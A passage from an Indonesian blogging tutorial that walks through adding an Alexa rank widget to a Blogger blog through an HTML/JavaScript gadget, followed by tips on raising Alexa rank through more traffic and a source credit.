  4. Klik Tambah Gadget.
  5. Klik tanda Plus (+) di samping tulisan HTML/JavaScript.
     
    html javascript

  6. Paste kode yang tadi ada di notepad kedalam kolom yang muncul.
  7. Klik tombol Simpan.
  8. Pindahkan elemen yang baru dibuat tadi ke tempat yang sobat inginkan, jika mau tentunya.
  9. Jangan lupa klik tombol Simpan yang ada di sebelah atas.
  10. Selesai.
Mudah - mudahan dengan di pasangnya widget alexa di blog sobat, alexa rank blog sobat akan cepat bagus ( semakin kecil semakin baik rangkingnya ). Sedikit tambahan, alexa rank terbilang cepat dalam melakukan update sehingga hasilnya akan terlihat dalam beberapa hari saja sobat,...

Satu yang paling utama dalam menaikan ranking alexa adalah dengan mencoba meningkatkan trafik atau jumlah kunjungan ke blog sobat dan cukup disini dulu tipsnya jangan lupa tambahkan jaringan teman anda di Kolom Blog GRATIS ( follow up ), sebar luaskan ilmu gratis ini kesemua orang yang sobat kenal atau pun tidak kenal dengan ikhlas. Semoga bermanfaat

Sumber : http://kolombloggratis.blogspot.com

 

Copyright @ 2013 shadow4rt.

&